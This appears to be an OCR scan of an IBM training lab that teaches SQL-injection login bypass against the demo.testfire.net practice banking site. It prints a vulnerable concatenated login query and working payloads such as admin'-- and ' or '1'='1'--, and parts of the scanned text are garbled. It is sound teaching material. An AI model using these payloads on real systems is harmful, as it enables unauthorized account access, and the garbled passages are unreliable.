IBM software 


Lab 3Login without Credentials 


In the training we saw how SQL injection can cause an application to use invalidated user input to either 
circumvent the application's business logic or interact with the database directly. 


In this lab we are going to check to see if the demo.testfire.net web application is susceptible to SQL 
injection and if we can exploit it to log into the application with out a password. 


In this lab we will see how to log in the demo.tesifire.net without a password. 


In this lab you will play the role of a malicious user 


Lab Overview 


e 3.1: Find the login page 


a. 
b. 


Can you create an account? 


Can you determine a valid username? 


e 3.2 Can you cause an error? 


a. What information do you learn when you cause an error? 
b. What database is this using? 
c. What are techniques that you might use? 
d. What characters terminate a SQL statement? 
e 3.3 Exploit 
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3.1. Find the Login Page 


__1. Open a Firefox browser by selecting the icon on the desktop 


a 
Mozilla Firefox 








__2. Enter the link http://demo.testfire.net/bank/login.aspx 


3.2 Can you cause an error? 


__1. Enter no username or password and select Login button 


Online Banking Login 


Username: 


Password: 





@ 
We learn a username is required 


Page 2 Lab 3 — Login without Credentials 
© 2007 IBM Corporation 


Bu on 


__3. Enter donald in the username field, leave the password field blank and select Login button 





Online Banking Login 


Username: donald | 
Password: | 








__4. Review return 





We learn the site uses client-side Javascript validation on each of 


= the fields 
You can right click on the page and select VIEW SOURCE to see 
the javascript used to validate that the username and password 


fields can not be blank. 


__5. Enter donald in the username field and a single ‘ in the password and select Login button 


Online Banking LogI 


Username: donald 


Password: I" 
Login | 
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__6. Review information that application returns 


An Error Has Occurred 


SUMMarys 
Ling J) Incorrect syntax near ™, 
Error Message: 


Cyrterni Gate, et. Seth betepeens Ling Ls Interac apntes fae". Uceded quotatian mark batere the character firing “. at 

Evstem. Bate. Cheb. ebb att eadar Proced pede Ole bbHRedult he) at Oyster. Date, Olebbh, Gleb ate ae ada, Mie te el) A 

Syeten Date, lett. OlettConmenand. Execute eadaerinternall Comnmandbehavior behavior, String method) af 

Syete rm Cte. Cee Olle ie mena. Execute aedadtamemandbakiawee behavior) at 

Syrzher, Gate, Aa, le ore, Saree, ate [bb orerend, Eee aderio reed Bas acer behaeeigr af 

System Date. Connon. bt steadapter. Fillinte nel Gatetet dataret, DataTable!) datetablec, Int? rtartheccrd, 1437 maxRecoede, String ercTable, 
DD Cormemacd comcnand, Commmandiehaviar -ehavior) at Syaterm. Gate. Common. Bb Gatesdaptar. Pa Gatasat datatet, 1nd? watiedcord, [nth 





Instead of a generic message the application returns details 
about the SOL query with enough information that we can make 
some assumptions about how to interact with the database. 


The fact that the single quote entered returns the error Line 1: 
Incorrect syntax near '"'. tells us that we have broken the syntax 
of the query, if we take a look at the actual query below, we can 
see that the user input caused a syntax error for the value of the 
password parameter. 


We can now use this knowledge to circumvent the business logic 


for the condition in the query 


Query: 

SOQLQuery = “SELECT Username FROM Users WHERE 
Username = ‘” & strUsername & “’ AND Password = ‘” & 
strPassword & “’” 


Resulting Query with above input 
SQLQuery = “SELECT Username FROM Users WHERE 


Username = ‘donald’ AND Password = i a 


We can now see that the single quote entered for the password 
broke the syntax. 


__f. Select browser Back button to return to login page 


@- 
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3.3 Exploit 


__1. Enter in username field dan’-- and anything in the password and select Login button 





Online Banking Login 


Username: [dan'--+ 
Password: le 








__2. Review information that application returns 





Login Failed - Invalid Username 


Username: [dan'-- 
Password: | 








The application is telling us our username is incorrect. 


The -- (two dashes) is used to indicate a comment and acts to 
terminate the SOL statement, so in our case this means a 
password will not be needed to login to the application, however 
we need to input a password into the form in order for the 
e javascript not to complain that it is missing, but it does not need 
to be the correct password as the SOL query will not use it. 


In effect our query has become: 


SOQLQuery = “SELECT Username FROM Users WHERE 
Username = ‘dan’-- everything after the two dashed is treated as 
a comment 
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__3. Enter in username field admin’-- and any password and select Login button 





Online Banking Login 


Username: [admin'-- 
Password: le 








__4. Review Results 





Hello, Admin User 


Welcome to Altoro Mutual Online. 


View Account Details: | v| GO 








We learn that a valid SQL statement = login 
SELECT Username FROM Users WHERE Username = 
‘smith’ AND Password = ‘demo1234’ 


SELECT Username FROM Users WHERE Username = 
‘admin’ -- ’ AND Password = ‘does not matter’ 


If we did not know a username we could have logged in as the 
first user in the table using the following input ‘or ‘]’=’]’-- 
SELECT Username FROM Users WHERE Username = °’ or 
‘1’=’]’-- AND Password = ‘does not matter’ 
The input causes a true condition and hence the username value 


does not matter (and the password part of the conditions is 
commented out) and we will log in as the first user in the 





database. 
__5. Select Back button 
@- 
__6. Close browser 
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